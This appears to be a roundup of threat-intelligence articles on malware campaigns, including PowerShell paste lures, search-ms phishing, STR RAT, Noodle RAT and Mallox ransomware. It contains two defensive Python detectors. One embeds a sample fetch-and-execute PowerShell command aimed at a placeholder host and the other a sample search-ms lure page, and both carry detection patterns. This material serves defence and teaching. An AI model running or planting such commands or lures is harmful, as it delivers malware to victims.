The warning message includes instructions to copy a PowerShell script and run it manually. This script flushes the DNS cache, clears the clipboard, displays a decoy message, and then downloads and executes a remote PowerShell script.

The remote script conducts Windows Management Instrumentation checks and then deploys Lumma Stealer malware, which downloads three payloads:

  • am.exe – Amadey Loader
  • ma.exe – A downloader that installs the XMRig cryptocurrency miner with a specific configuration
  • cl.exe – A clipboard hijacker that replaces cryptocurrency addresses in the clipboard to redirect funds to the threat actor's address during transactions

In some cases, the Amadey malware also downloads additional malware, including a Go-based threat believed to be JaskaGo, which can target both Windows and macOS systems.

"This means that in total, five distinct malware families could be executed just by running the one initial PowerShell script," the researchers noted.

The ClearFix campaign used a similar tactic. Attackers employed a compromised website with an iframe overlay, displaying a Google Chrome error message instructing users to open "Windows PowerShell (Admin)" and paste malicious code, ultimately leading to the Vidar Stealer being downloaded and executed.

In another campaign attributed to TA571, the group sent out over 100,000 phishing emails to thousands of organizations globally. These emails contained a malicious HTML attachment disguised as a Microsoft Word page, displaying an error message about the "Word Online extension not being installed," and offering two options: "How to fix" and "Auto-fix."

Clicking "How to fix" copies a Base64-encoded PowerShell command to the clipboard, instructing the user to open PowerShell and paste the command. The "Auto-fix" button uses the search-ms protocol to display a WebDAV-hosted "fix.msi" or "fix.vbs" file.
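Both the fake "fix" script described earlier (DNS-cache flush, clipboard clearing, decoy message, remote script fetch) and the Base64-encoded command the TA571 lure copies to the clipboard end the same way: PowerShell launched by the user from the Run dialog with an encoded command. As an added example, not Proofpoint's code or anything from the campaign, the Python triage routine below decodes the -EncodedCommand argument from constructed process-creation events and flags that combination; the sample events, field names and payload URL are constructed placeholders.

```python
"""Flag the paste-into-PowerShell pattern in process-creation telemetry:
powershell.exe spawned from explorer.exe (Run dialog) with an encoded command
whose decoded body flushes DNS, touches the clipboard and fetches a remote script."""
import base64
import binascii
import re

# Indicators named in the write-up: remote fetch/eval and the decoy clean-up steps.
REMOTE_FETCH = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE)
DECOY_STEPS = re.compile(r"(flushdns|clear-dnsclientcache|set-clipboard)", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_SWITCH = re.compile(r"^[-/](e|ec|enc|encodedcommand)$", re.IGNORECASE)


def _encode_ps(script):
    """Build a -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64).
    Used only to construct the sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (placeholder telemetry, not taken from the report).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # the lure: the user pastes the "fix" into Win+R
        "parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
        "cmdline": "powershell.exe -w hidden -ep bypass -enc " + _encode_ps(
            "ipconfig /flushdns; Set-Clipboard -Value ' '; "
            "Write-Host 'Applying fix, please wait'; "
            "iex (irm 'http://payload-placeholder.invalid/stage2.ps1')"),
    },
    {   # routine management script launched by an agent
        "parent": r"C:\Program Files\Vendor\Agent.exe", "image": PS_EXE,
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    },
    {   # encoded but harmless: run from the shell, no remote fetch
        "parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
        "cmdline": "powershell.exe -enc " + _encode_ps("Get-Date"),
    },
]


def decode_encoded_command(cmdline):
    """Return the decoded script behind -e/-enc/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_SWITCH.match(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def assess_event(event):
    """Score one process-creation event; 'suspicious' requires a remote fetch
    plus either the explorer.exe parent or the decoy clean-up steps."""
    flags = set()
    if event["parent"].lower().endswith("\\explorer.exe"):
        flags.add("explorer_parent")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        flags.add("encoded")
        if REMOTE_FETCH.search(decoded):
            flags.add("remote_fetch")
        if DECOY_STEPS.search(decoded):
            flags.add("decoy_steps")
    suspicious = "remote_fetch" in flags and bool(flags & {"explorer_parent", "decoy_steps"})
    return {"decoded": decoded, "flags": flags, "suspicious": suspicious}


def triage(events):
    """Return the assessments of the events worth an analyst's attention."""
    return [r for r in (assess_event(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(sorted(hit["flags"]), "->", hit["decoded"][:60])
```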

Executing the MSI file installs Matanbuchus, another malware loader, while the VBS file downloads and runs the DarkGate attack code.

"Proofpoint assesses with high confidence that TA571 infections can lead to ransomware," the researchers said, noting that this group continually modifies its email lures and attack chains.

The security firm also provided examples of indicators of compromise and advised organizations to train employees to recognize and report suspicious activity, particularly social engineering attacks of this nature. 

Defending Hospitals and Clinics: Strategies Against Ransomware


The healthcare industry has become a prime target for ransomware attacks in recent years. These malicious campaigns exploit vulnerabilities in healthcare systems, disrupt critical services, and compromise sensitive patient data. 

According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely to lose 20% of their sensitive data after a ransomware attack.

This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.

1. Data Sensitivity and Volume

Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories, and financial information. This data is a goldmine for cybercriminals seeking financial gain. According to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.

2. Architectural Similarities

While ransomware operators don’t exclusively focus on healthcare, the industry shares architectural nuances with other sectors. For instance:

Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.

Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.

Medical Devices: Internet of Things (IoT) devices, such as MRI machines and infusion pumps, are integral to patient care. However, they often lack proper security controls, making them vulnerable.

3. Risk Surface Area

Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:

Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data based on roles and responsibilities helps prevent unauthorized changes.

Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.

Backup and Recovery: Robust backup solutions are critical. Regularly backing up data ensures that even if ransomware strikes, organizations can restore systems without paying the ransom.

4. Incident Response Challenges

Healthcare organizations face unique challenges in incident response:

Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.

Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.

Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.

When Legit Downloads Go Rogue: The Oyster Backdoor Story


Researchers from Rapid7 recently uncovered a sophisticated malvertising campaign that exploits unsuspecting users searching for popular software downloads. This campaign specifically targets users seeking legitimate applications like Google Chrome and Microsoft Teams, leveraging fake software installers to distribute the Oyster backdoor, also known as Broomstick.

“Rapid7 observed that the websites were masquerading as Microsoft Teams websites, enticing users into believing they were downloading legitimate software when, in reality, they were downloading the threat actor’s malicious software,” said the report.

How the Malvertising Campaign Works

The modus operandi of this campaign involves luring users to malicious websites. The threat actors create typo-squatted sites that closely mimic legitimate platforms. For instance, users searching for Microsoft Teams might inadvertently land on a fake Microsoft Teams download page. These malicious websites host supposed software installers, enticing users to download and install the application.

Fake Installers

However, the catch lies in the content of these fake installers. When users download them, they unknowingly execute the Oyster backdoor. This stealthy piece of malware allows attackers to gain unauthorized access to compromised systems. 

Once the backdoor is in place, attackers can engage in hands-on keyboard activity, directly interacting with the compromised system. Furthermore, the Oyster backdoor can deploy additional payloads after execution, potentially leading to further compromise or data exfiltration.

Impact and Mitigation

The impact on users who fall victim to this malvertising campaign can be severe. They inadvertently install the Oyster backdoor on their systems, providing attackers with a foothold. From there, attackers can escalate privileges, steal sensitive information, or launch other attacks.

To reduce such risks, users should remain vigilant:

  • Verify Sources: Always verify the legitimacy of software sources before downloading. Avoid third-party download sites and opt for official websites or trusted app stores.
  • Security Software: Regularly update and use security software to detect and prevent malware infections.
  • User Education: Educate users about the risks of malvertising and emphasize safe browsing practices.

Inside the Velvet Ant’s Web: F5 BIG-IP Vulnerabilities Exposed


Cybersecurity threats have evolved beyond traditional attack vectors. One such sophisticated campaign involves the exploitation of F5 BIG-IP appliances by a group known as ‘Velvet Ant.’ In this blog post, we delve into the details of this stealthy data theft operation, shedding light on the techniques employed and the implications for organizations worldwide.

According to a Sygnia report, which discovered the breach after being called in to investigate the cyberattack, Velvet Ant established multiple footholds across the network, including a legacy F5 BIG-IP appliance that served as an internal command and control (C2) server.

The ‘Velvet Ant’ Group

The ‘Velvet Ant’ group, suspected to have ties to Chinese state-sponsored actors, has been active since at least 2017. Their primary focus is on cyber espionage, targeting government entities, defense contractors, and critical infrastructure organizations. Their modus operandi involves gaining persistent access to internal networks, exfiltrating sensitive data, and maintaining long-term presence without detection.

F5 BIG-IP Appliances: A Prime Target

F5 BIG-IP appliances are widely used for load balancing, application delivery, and security functions. Unfortunately, their ubiquity also makes them an attractive target for threat actors. The ‘Velvet Ant’ group leverages vulnerabilities in these devices to achieve their objectives.

The Malware Campaign

  • Initial Compromise: The group gains initial access through known vulnerabilities in F5 BIG-IP devices. These vulnerabilities allow them to bypass authentication and execute arbitrary code.
  • Custom Malware Deployment: Once inside the network, the attackers deploy custom malware tailored for F5 BIG-IP appliances. This malware establishes a covert channel for communication, allowing the group to maintain persistence.
  • Data Exfiltration: The malware exfiltrates sensitive data, including intellectual property, classified documents, and personally identifiable information (PII). The stealthy nature of the operation ensures that data theft remains undetected for extended periods.
  • Lateral Movement: The ‘Velvet Ant’ group moves laterally within the network, escalating privileges and accessing additional resources. They carefully avoid triggering alarms or arousing suspicion.
  • Long-Term Presence: Unlike traditional smash-and-grab attacks, this group aims for longevity. By maintaining a foothold, they can continuously monitor and extract valuable information.

Mitigation Strategies

  • Patch Management: Regularly update F5 BIG-IP devices to address known vulnerabilities. Timely patching reduces the attack surface.
  • Network Segmentation: Isolate critical systems from less secure segments to limit lateral movement.
  • Behavioral Analytics: Implement solutions that detect anomalous behavior within the network. Unusual data flows or unauthorized access attempts should trigger alerts.
  • Threat Intelligence Sharing: Collaborate with industry peers and share threat intelligence. Early detection of emerging threats is crucial.

Phishing Attack Abuses Windows Search Protocol to Deploy Malware

A recently developed phishing campaign has emerged, leveraging the Windows Search protocol to deliver malicious scripts to unsuspecting users. This sophisticated attack uses HTML attachments to exploit the search-ms URI, pushing harmful batch files hosted on remote servers.

The Windows Search protocol is a Uniform Resource Identifier (URI) that allows applications to open Windows Explorer and perform searches with specific parameters. Typically, these searches are conducted on the local device’s index. However, attackers have discovered that it’s possible to manipulate Windows Search to query file shares on remote hosts, presenting these remote files as if they were local.

The recent phishing attacks, as detailed in a report by Trustwave SpiderLabs, start with a seemingly innocuous email. The email contains an HTML attachment disguised as an invoice document within a ZIP archive. This ZIP file format helps evade many security and antivirus scanners that might not inspect the contents thoroughly.

Upon opening the HTML file, it uses a `<meta http-equiv="refresh">` tag to automatically redirect the browser to a malicious URL. A clickable anchor tag provides a fallback mechanism if the automatic redirect fails due to browser settings or other reasons. This URL exploits the Windows Search protocol to perform a search on a remote host.

The search parameters in this phishing attack are ingeniously crafted to mislead users. The query searches for items labeled "INVOICE," while the crumb parameter sets the search scope, directing it to a malicious server through Cloudflare. The display name is altered to "Downloads," giving the appearance of a legitimate interface. Additionally, Cloudflare's tunnelling service masks the server, making the remote resources appear as though they are local files.

The search results display a single shortcut (LNK) file named as an invoice. When the victim clicks on this file, it triggers a batch script (BAT) hosted on the same remote server.

The exact operations of the batch script remain unknown, as Trustwave researchers could not analyse it due to the server being offline at the time of their investigation. However, the potential for harmful activities, such as data theft or system compromise, is significant.

To defend against this threat, Trustwave suggests removing registry entries associated with the search-ms/search URI protocol. This can be done by executing specific commands in the registry editor. However, this action should be taken cautiously as it may disrupt legitimate applications and Windows features that rely on this protocol.

This new phishing method highlights the twisted tactics of cybercriminals and the importance of staying vigilant. Users and organisations must be aware of such threats and implement robust security measures to protect against these sophisticated attacks. Regular updates to security protocols and awareness training can help mitigate the risks posed by these kinds of phishing campaigns.


New Malware Campaign Exploits Windows Search to Spread

A new and intricate malware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.


HTML Attachment Mechanics

Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh">` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.


Exploitation of the Search Protocol

When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.


Execution of Malicious Files

After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.

To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.
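As an added example serving both Trustwave write-ups above (not Trustwave's or MailMarshal's code), the Python triage routine below pulls search-ms:/search: URIs out of an HTML attachment's meta refresh and anchor tags, decodes the query, crumb and displayname parameters, and flags a remote search scope or a display name that mimics a local folder. The sample attachment and the host name inside it are constructed placeholders.

```python
"""Static triage of an HTML attachment for search-ms / search URI abuse."""
import re
from urllib.parse import unquote

SEARCH_SCHEMES = ("search-ms", "search")
# Display names an attacker would pick to make a remote share look like a local folder.
LOCAL_FOLDER_NAMES = {"downloads", "desktop", "documents", "pictures"}

_META_REFRESH = re.compile(
    r'<meta\s+[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE)
_HREF = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed sample attachment (placeholder host, not the real campaign file):
# a zero-delay meta refresh to a search: URI and an anchor fallback using search-ms:.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=search:query=INVOICE&crumb=location:%5C%5Cexample-placeholder.invalid%5Cshare&displayname=Downloads">
</head><body>
<p>If the invoice does not open automatically, click below.</p>
<a href="search-ms:query=INVOICE&crumb=location:%5C%5Cexample-placeholder.invalid%5Cshare&displayname=Downloads">Open invoice</a>
</body></html>"""


def extract_uris(html_text):
    """Return every target URI reachable from a meta refresh or an anchor href."""
    uris = []
    for content in _META_REFRESH.findall(html_text):
        # content looks like "0; url=search:..." ; the delay value is irrelevant here
        m = re.search(r"url\s*=\s*(.+)$", content, re.IGNORECASE)
        if m:
            uris.append(m.group(1).strip())
    uris.extend(_HREF.findall(html_text))
    return uris


def parse_search_uri(uri):
    """Split a search-ms:/search: URI into its scheme and decoded key/value
    parameters; return None for any other scheme."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in SEARCH_SCHEMES:
        return None
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        if key:
            params[key.strip().lower()] = unquote(value)
    return {"scheme": scheme.lower(), "params": params}


def assess(parsed):
    """Flag the two traits the campaign relies on: a search scope (crumb) that
    points at a remote host, and a display name that mimics a local folder."""
    params = parsed["params"]
    crumb = params.get("crumb", "")
    scope = crumb.split(":", 1)[1] if crumb.lower().startswith("location:") else crumb
    remote = scope.startswith("\\\\") or "://" in scope
    spoofed = params.get("displayname", "").strip().lower() in LOCAL_FOLDER_NAMES
    return {
        "scheme": parsed["scheme"],
        "query": params.get("query", ""),
        "scope": scope,
        "remote_scope": remote,
        "spoofed_display_name": spoofed,
        "suspicious": remote or spoofed,
    }


def scan_attachment(html_text):
    """Return one assessment per search-protocol URI found in the attachment."""
    findings = []
    for uri in extract_uris(html_text):
        parsed = parse_search_uri(uri)
        if parsed:
            findings.append(assess(parsed))
    return findings


if __name__ == "__main__":
    for finding in scan_attachment(SAMPLE_HTML):
        print(finding)
```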

This attack underscores the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


STR RAT: A Persistent Remote Access Trojan


The STR RAT is a remote access trojan (RAT) written in Java, first detected in 2020. Like other RATs, it allows threat actors full control of an infected machine. STR RAT is capable of keylogging, credential theft, and deploying additional malicious payloads. 

The malware is updated annually, aligning with its renewed use by threat actors. Cofense's analysis from January 2023 to April 2024 reveals that 60% of STR RAT samples are delivered directly via email rather than embedded links.

History of STR RAT

STR RAT resembles a seasonal flu, with yearly updates making it more prominent for short periods. Initially discovered on an antivirus forum in 2020, version 1.2 already featured keylogging, password theft, and backdoor access, along with a fake “.crimson” ransomware module that only renamed files. In 2021, Microsoft Threat Intelligence highlighted STR RAT in phishing campaigns. By 2022, it spoofed the Maersk shipping brand and employed a polyglot file technique, allowing execution as an MSI or Java file. In 2023, version 1.6 used Zelix KlassMaster and Allatori for code obfuscation. In 2024, STR RAT was uploaded to legitimate services like GitHub and AWS, making it harder to detect.

STR RAT steals passwords from Chrome, Firefox, Internet Explorer, and email clients like Outlook, Thunderbird, and Foxmail. Key commands include o-keylogger for logging keystrokes, down-n-exec for file execution, remote-screen for commandeering the computer, and power-shell for PowerShell access.

Current Usage and Impact

Though not as prevalent as other RATs like Remcos, STR RAT showed sustained activity from March to August 2023, likely due to the new version and polyglot file technique. In March 2024, significant activity was noted again, attributed to the use of legitimate services like GitHub and AWS for hosting and delivering the malware. STR RAT is typically delivered via email as an archive containing a .jar file, requiring a Java Runtime Environment (JRE) to execute. These archives may also contain necessary JRE binaries or download them from Maven and GitHub repositories.

Delivery Mechanisms

STR RAT's second most common delivery mechanism is loaders, which reach out to a payload location to download and run the malware. Jar Downloaders, CVE-2017-11882 exploits in Microsoft Office, and Windows Registry File downloaders are commonly used loaders. Additionally, embedded URLs in emails or attached PDFs often lead to the malware hosted on legitimate services like AWS, GitHub, and Discord’s CDN.

Unlike loaders, droppers contain the malware to be deployed. STR RAT's most common dropper is the JavaScript Dropper (JS Dropper), a .js file that executes natively on Windows. JS Droppers are usually attached to emails and contain both the dropper and STR RAT.

Behavior and Capabilities

Upon execution, STR RAT places files, creates persistence, and installs dependencies. It uses geolocator services to geo-fingerprint infected computers and sends system information to its command-and-control (C2) server. The malware also uses legitimate Java libraries for keylogging and database connectivity.

Detection and Hunting

Different versions of STR RAT leave various indicators of compromise (IOCs). After execution, STR RAT copies itself to multiple locations, creates a \lib\ folder with legitimate files, and generates an XXXXlock.file in the user's local home profile. The configuration can be observed through memory analysis, revealing the C2 server, port, and domain.

Persistence

STR RAT can create persistence through Registry Run Keys, Startup Folder entries, or Scheduled Tasks, ensuring the malware runs every time the user logs in. Endpoint detection and response software can monitor specific locations for signs of STR RAT persistence.

Network Traffic

STR RAT communicates with C2 servers using subdomains of free dynamic DNS services and legitimate services like GitHub and Maven. HTTP is used for C2 communications, though the port is not the standard tcp/80.

Legitimate Services

STR RAT reaches out to legitimate services for hosting tools and malware. Indicators of suspicious activity include access to GitHub and Maven repositories in conjunction with other malicious behaviors.

By understanding STR RAT's history, capabilities, and delivery mechanisms, cybersecurity professionals can better detect and defend against this persistent threat.

Chinese Threat Actors Leveraging 'Noodle RAT' Backdoor


A backdoor in Executable and Linkable Format (ELF) files used by Chinese hackers has been misidentified as a version of existing malware for years, Trend Micro claimed in a recent analysis. 

In Noodle RAT: Reviewing the New Backdoor utilised by Chinese-Speaking Groups, a blog post based on a Botconf 2024 presentation, Trend Micro Research revealed Noodle RAT, a remote access Trojan employed by Chinese-speaking groups involved in espionage or criminal activity.

Noodle RAT, aka ANGRYREBEL or Nood RAT, has been active since at least 2018. However, it was always regarded as a variant of an existing malware strain, such as Gh0st RAT or Rekoobe.

“For instance, NCC Group released a report on a variant of Gh0st RAT used by Iron Tiger in 2018. Talos released a report on an ELF backdoor used by Rocke (aka Iron Cybercrime Group) in 2018. Sophos released a report on a Linux version of the Gh0st RAT variant used in the Cloud Snooper Campaign in 2018. Positive Technology Security released a report on Calypso RAT used by Calypso APT in 2019,” noted Trend Micro. 

The cybersecurity provider's threat intelligence team revealed that the ELF backdoor mentioned in these reports was actually a new malware strain known as Noodle RAT. 

Noodle RAT: New Malware Strain

Since 2020, the researchers claim to have discovered espionage campaigns employing Noodle RAT that targeted Thailand, India, Japan, Malaysia, and Taiwan. 

The Windows version of Noodle RAT contains several links to Gh0st RAT, a malware strain developed by the C. Rufus Security Team in China and exposed in 2008. For example, Win.NOODLERAT and Gh0st RAT share plugins, and the former employs a slightly similar packet encryption method to that employed by various Gh0st RAT variants, including Gh0stCringe, HiddenGh0st, and Gh0stTimes. 

However, the rest of Win.NOODLERAT and Gh0st RAT's code does not appear to be comparable, prompting Trend Micro to infer that the plugins were simply reused, despite the fact that the backdoor is completely different. 

Additionally, some Linux.NOODLERAT's code is identical to Rekoobe v2018, a backdoor built on Tiny SHell (or tsh) whose source code is freely available on GitHub. Specifically, both use the same reverse shell and process name spoofing techniques. 

“Still, since the rest of the code of Linux.NOODLERAT is totally different from any version of Rekoobe or Tiny SHell, we can conclude that Linux.NOODLERAT should be classified as another malware family,” Trend Micro concluded.

Unmasking the Mallox Ransomware Variant: Targeting VMWare ESXi Environments


Key highlights

  • The variant specifically checks if a targeted system is running in a VMWare ESXi environment and has administrative rights. If these requirements are not met, it won’t proceed with an attack.
  • The Linux variant uses a custom shell script for payload delivery and execution, a departure from Mallox’s previous methods.
  • The adversary behind this variant is a Mallox affiliate known as “vampire,” suggesting broader campaigns with high ransom demands and extensive IT system targeting.
  • The custom shell also exfiltrates victim information to two different servers, ensuring the ransomware actors have a backup of the data.

The Mallox ransomware group

The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to transmit and execute its payload only on workstations with high-level user capabilities.

The variant, discovered by Trend Micro researchers who monitor Mallox as TargetCompany, specifically determines whether a targeted system is running in a VMware ESXi environment and has administrative rights, and will not launch an attack if these conditions are not met.

Selective targeting and privileged environments

Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.

Custom Shell: Sophisticated attack

The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.

Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.

Implications

The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.

This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.

In addition to delivery and execution, the custom shell script sends the victim's information to two additional servers, allowing the ransomware operators to keep a backup. Mallox is reported to have used a leak site with the same name to publish data obtained during ransomware attacks.

How does the Mallox variant work?

This current variant first examines a system to verify if the executable is executing with administrative privileges; if not, it will not continue its operation.

Following execution, the variation creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.

The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.

Data extraction strategies

The program also checks to see if the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If that's the case, it uses its encryption process, attaching the ".locked" extension to encrypted files and dropping a ransom letter called HOW TO DECRYPT.txt. The researchers found that both the extension and the note deviate from the Windows variant.

The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, it reads the contents of the dropped text file and uploads it to another URL.

The variation also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.

After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.

Linux ESXi Environments: Beware of Cyberattacks

Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.

The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.